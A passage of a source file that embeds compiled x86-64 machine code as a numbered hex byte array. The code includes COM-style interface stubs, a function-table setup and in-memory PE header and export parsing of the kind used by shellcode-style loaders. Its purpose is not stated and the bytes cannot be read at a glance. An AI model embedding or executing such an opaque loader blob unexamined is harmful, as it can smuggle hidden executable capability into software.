833 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, | |
834 | 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, | |
835 | 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, | |
836 | 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b, | |
837 | 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, | |
838 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
839 | 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, | |
840 | 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8, | |
841 | 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, | |
842 | 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83, | |
843 | 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, | |
844 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, | |
845 | 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, | |
846 | 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83, | |
847 | 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70, | |
848 | 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, | |
849 | 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48, | |
850 | 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28, | |
851 | 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0, | |
852 | 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, | |
853 | 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48, | |
854 | 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, | |
855 | 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, | |
856 | 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8, | |
857 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, | |
858 | 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, | |
859 | 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8, | |
860 | 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48, | |
861 | 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, | |
862 | 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b, | |
863 | 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55, | |
864 | 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, | |
865 | 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, | |
866 | 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48, | |
867 | 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, | |
868 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, | |
869 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
870 | 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, | |
871 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff, | |
872 | 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00, | |
873 | 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
874 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, | |
875 | 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
876 | 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
877 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, | |
878 | 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
879 | 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, | |
880 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
881 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, | |
882 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
883 | 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, | |
884 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00, | |
885 | 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
886 | 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, | |
887 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00, | |
888 | 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
889 | 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, | |
890 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00, | |
891 | 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
892 | 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, | |
893 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00, | |
894 | 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
895 | 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, | |
896 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00, | |
897 | 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
898 | 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, | |
899 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00, | |
900 | 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
901 | 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48, | |
902 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00, | |
903 | 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
904 | 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48, | |
905 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, | |
906 | 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
907 | 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00, | |
908 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
909 | 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, | |
910 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00, | |
911 | 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
912 | 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89, | |
913 | 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
914 | 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00, | |
915 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
916 | 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48, | |
917 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00, | |
918 | 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
919 | 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89, | |
920 | 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
921 | 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00, | |
922 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
923 | 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48, | |
924 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, | |
925 | 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
926 | 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89, | |
927 | 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
928 | 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00, | |
929 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
930 | 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48, | |
931 | 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
932 | 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, | |
933 | 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, | |
934 | 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1, | |
935 | 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc, | |
936 | 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, | |
937 | 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, | |
938 | 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00, | |
939 | 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca, | |
940 | 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30, | |
941 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, | |
942 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83, | |
943 | 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91, | |
944 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48, | |
945 | 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, | |
946 | 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00, | |
947 | 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, | |
948 | 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, | |
949 | 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00, | |
950 | 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
951 | 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
952 | 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d, | |
953 | 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, | |
954 | 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10, | |
955 | 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, | |
956 | 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, | |
957 | 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, | |
958 | 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, | |
959 | 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, | |
960 | 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, | |
961 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, | |
962 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0, | |
963 | 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, | |
964 | 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc, | |
965 | 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
966 | 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d, | |
967 | 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48, | |
968 | 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, | |
969 | 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, | |
970 | 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, | |
971 | 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03, | |
972 | 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
973 | 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10, | |
974 | 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, | |
975 | 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, | |
976 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, | |
977 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
978 | 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, | |
979 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
980 | 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b, | |
981 | 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0, | |
982 | 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, | |
983 | 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, | |
984 | 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec, | |
985 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, | |
986 | 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10, | |
987 | 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50, | |
988 | 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54, | |
989 | 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, | |
990 | 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10, | |
991 | 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60, | |
992 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, | |
993 | 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
994 | 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, | |
995 | 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, | |
996 | 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, | |
997 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, | |
998 | 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
999 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, | |
1000 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66, | |
1001 | 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, | |
1002 | 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, | |
1003 | 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, | |
1004 | 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18, | |
1005 | 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
1006 | 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
1007 | 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
1008 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, | |
1009 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, | |
1010 | 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
1011 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, | |
1012 | 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
1013 | 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, | |
1014 | 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, | |
1015 | 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, | |
1016 | 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, | |
1017 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, | |
1018 | 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
1019 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, | |
1020 | 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
1021 | 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, | |
1022 | 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, | |
1023 | 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, | |
1024 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, | |
1025 | 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, | |
1026 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, | |
1027 | 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
1028 | 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0, | |
1029 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, | |
1030 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, | |
1031 | 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, | |
1032 | 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, | |
1033 | 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, | |
1034 | 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, | |
1035 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
1036 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60, | |
1037 | 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, | |
1038 | 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00, | |
1039 | 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08, | |
1040 | 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00, | |
1041 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, | |
1042 | 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b, | |
1043 | 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, | |
1044 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
1045 | 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48, | |
1046 | 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, | |
1047 | 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4, | |
1048 | 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
